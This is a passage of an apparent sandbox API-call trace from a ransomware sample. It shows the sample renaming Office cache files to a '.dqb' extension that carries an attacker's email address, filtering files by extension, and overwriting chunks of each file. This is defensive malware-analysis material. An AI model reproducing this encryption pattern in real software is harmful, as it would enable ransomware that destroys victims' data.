(lpString=".zip") returned 4 [0061.875] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0061.875] lstrlenW (lpString=".rar") returned 4 [0061.875] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0061.875] lstrlenW (lpString=".bz2") returned 4 [0061.875] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0061.875] lstrlenW (lpString=".7z") returned 3 [0061.875] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0061.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0061.875] lstrlenW (lpString=".dbf") returned 4 [0061.876] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0061.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0061.876] lstrlenW (lpString=".1cd") returned 4 [0061.876] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0061.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0061.876] lstrlenW (lpString=".jpg") returned 4 [0061.876] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0061.876] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.876] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 12 os_tid = 0xacc [0032.432] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10000) returned 0x650970 [0032.432] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10000) returned 0x3870048 [0032.433] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0300 [0032.433] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6) returned 0x5c30a0 [0032.433] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0318 [0032.433] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x100000) returned 0x3970020 [0032.433] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0330 [0032.433] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c0330, Size=0x20) returned 0x5a5c78 [0032.433] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0330 [0032.433] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c0330, Size=0x20) returned 0x5a5ca0 [0032.433] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.433] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.433] Wow64DisableWow64FsRedirection (in: OldValue=0x2dbff58 | out: OldValue=0x2dbff58*=0x0) returned 1 [0032.433] lstrlenW (lpString="kernel32.dll") returned 12 [0032.433] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5c78 | out: hHeap=0x570000) returned 1 [0032.433] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.433] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5ca0 | out: hHeap=0x570000) returned 1 [0032.433] Sleep (dwMilliseconds=0x64) [0032.619] Sleep (dwMilliseconds=0x64) [0033.007] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0033.015] lstrlenW (lpString="PowerPointMUI.msi") returned 17 [0033.024] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0033.024] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=2503680) returned 1 [0033.024] CloseHandle (hObject=0x18c) returned 1 [0033.024] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi")) returned 0x2020 [0033.024] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0033.024] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0033.024] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0033.025] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0x0) returned 1 [0033.025] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0033.025] ReadFile (in: hFile=0x18c, lpBuffer=0x3970058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x3970058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0033.032] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0033.032] ReadFile (in: hFile=0x18c, lpBuffer=0x39b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39b0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0033.044] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0033.044] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0033.044] ReadFile (in: hFile=0x18c, lpBuffer=0x39f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39f0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0033.062] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0033.062] WriteFile (in: hFile=0x18c, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xc010e, lpNumberOfBytesWritten=0x2dbfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfcb0*=0xc010e, lpOverlapped=0x0) returned 1 [0033.301] SetEndOfFile (hFile=0x18c) returned 1 [0033.301] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f024c0 [0033.379] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0033.379] WriteFile (in: hFile=0x18c, lpBuffer=0x3f024c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f024c0*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.109] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0034.109] WriteFile (in: hFile=0x18c, lpBuffer=0x3f024c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f024c0*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.115] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0034.115] WriteFile (in: hFile=0x18c, lpBuffer=0x3f024c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f024c0*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.118] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f024c0 | out: hHeap=0x570000) returned 1 [0034.120] CloseHandle (hObject=0x18c) returned 1 [0034.474] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.474] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.474] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.474] lstrlenW (lpString=".doc") returned 4 [0034.474] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0034.474] lstrlenW (lpString=".docx") returned 5 [0034.474] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0034.474] lstrlenW (lpString=".pdf") returned 4 [0034.474] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0034.474] lstrlenW (lpString=".xls") returned 4 [0034.474] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0034.474] lstrlenW (lpString=".xlsx") returned 5 [0034.474] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0034.474] lstrlenW (lpString=".ppt") returned 4 [0034.474] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0034.474] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.474] lstrlenW (lpString=".zip") returned 4 [0034.474] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0034.474] lstrlenW (lpString=".rar") returned 4 [0034.474] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0034.474] lstrlenW (lpString=".bz2") returned 4 [0034.474] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0034.475] lstrlenW (lpString=".7z") returned 3 [0034.475] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0034.475] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.475] lstrlenW (lpString=".dbf") returned 4 [0034.475] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0034.475] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.475] lstrlenW (lpString=".1cd") returned 4 [0034.475] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0034.475] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.475] lstrlenW (lpString=".jpg") returned 4 [0034.475] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0034.475] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.475] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.475] lstrlenW (lpString=".doc") returned 4 [0034.475] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0034.475] lstrlenW (lpString=".docx") returned 5 [0034.475] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0034.475] lstrlenW (lpString=".pdf") returned 4 [0034.475] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0034.475] lstrlenW (lpString=".xls") returned 4 [0034.475] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0034.475] lstrlenW (lpString=".xlsx") returned 5 [0034.475] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0034.475] lstrlenW (lpString=".ppt") returned 4 [0034.475] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0034.475] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.475] lstrlenW (lpString=".zip") returned 4 [0034.475] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0034.475] lstrlenW (lpString=".rar") returned 4 [0034.475] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0034.475] lstrlenW (lpString=".bz2") returned 4 [0034.475] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0034.475] lstrlenW (lpString=".7z") returned 3 [0034.475] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0034.476] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.476] lstrlenW (lpString=".dbf") returned 4 [0034.476] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0034.476] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.476] lstrlenW (lpString=".1cd") returned 4 [0034.476] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0034.476] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.476] lstrlenW (lpString=".jpg") returned 4 [0034.476] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0034.476] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0034.476] lstrlenW (lpString="PubLR.cab") returned 9 [0034.476] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0034.476] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=9958388) returned 1 [0034.476] CloseHandle (hObject=0x18c) returned 1 [0034.476] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab")) returned 0x2020 [0034.476] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.477] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0034.477] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0034.477] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0x0) returned 1 [0034.477] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0034.477] ReadFile (in: hFile=0x18c, lpBuffer=0x3970058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x3970058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0034.484] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x32a6a6, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0034.484] ReadFile (in: hFile=0x18c, lpBuffer=0x39b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39b0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0034.491] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0034.491] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x93f3f4, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0034.491] ReadFile (in: hFile=0x18c, lpBuffer=0x39f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39f0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0034.509] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.509] WriteFile (in: hFile=0x18c, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x2dbfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0034.534] SetEndOfFile (hFile=0x18c) returned 1 [0034.534] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f024c0 [0034.538] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0034.538] WriteFile (in: hFile=0x18c, lpBuffer=0x3f024c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f024c0*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.539] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x32a6a6, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0034.539] WriteFile (in: hFile=0x18c, lpBuffer=0x3f024c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f024c0*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.543] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x93f3f4, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0034.543] WriteFile (in: hFile=0x18c, lpBuffer=0x3f024c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f024c0*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.548] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f024c0 | out: hHeap=0x570000) returned 1 [0034.549] CloseHandle (hObject=0x18c) returned 1 [0037.292] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0037.292] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.292] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.292] lstrlenW (lpString=".doc") returned 4 [0037.292] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0037.292] lstrlenW (lpString=".docx") returned 5 [0037.292] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0037.292] lstrlenW (lpString=".pdf") returned 4 [0037.292] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0037.292] lstrlenW (lpString=".xls") returned 4 [0037.292] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0037.292] lstrlenW (lpString=".xlsx") returned 5 [0037.292] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0037.292] lstrlenW (lpString=".ppt") returned 4 [0037.292] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0037.292] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.292] lstrlenW (lpString=".zip") returned 4 [0037.292] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0037.292] lstrlenW (lpString=".rar") returned 4 [0037.292] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0037.292] lstrlenW (lpString=".bz2") returned 4 [0037.292] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0037.292] lstrlenW (lpString=".7z") returned 3 [0037.292] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0037.292] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.293] lstrlenW (lpString=".dbf") returned 4 [0037.293] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0037.293] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.293] lstrlenW (lpString=".1cd") returned 4 [0037.293] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0037.293] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.293] lstrlenW (lpString=".jpg") returned 4 [0037.293] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0037.293] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.293] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.293] lstrlenW (lpString=".doc") returned 4 [0037.293] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0037.293] lstrlenW (lpString=".docx") returned 5 [0037.293] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0037.293] lstrlenW (lpString=".pdf") returned 4 [0037.293] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0037.293] lstrlenW (lpString=".xls") returned 4 [0037.293] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0037.293] lstrlenW (lpString=".xlsx") returned 5 [0037.293] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0037.293] lstrlenW (lpString=".ppt") returned 4 [0037.293] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0037.293] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.293] lstrlenW (lpString=".zip") returned 4 [0037.293] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0037.293] lstrlenW (lpString=".rar") returned 4 [0037.293] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0037.293] lstrlenW (lpString=".bz2") returned 4 [0037.293] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0037.293] lstrlenW (lpString=".7z") returned 3 [0037.293] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0037.293] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.293] lstrlenW (lpString=".dbf") returned 4 [0037.293] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0037.294] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.294] lstrlenW (lpString=".1cd") returned 4 [0037.294] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0037.294] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0037.294] lstrlenW (lpString=".jpg") returned 4 [0037.294] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0037.294] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0037.294] lstrlenW (lpString="WordLR.cab") returned 10 [0037.294] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0037.294] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=43806141) returned 1 [0037.294] CloseHandle (hObject=0x18c) returned 1 [0037.294] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab")) returned 0x2020 [0037.294] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all 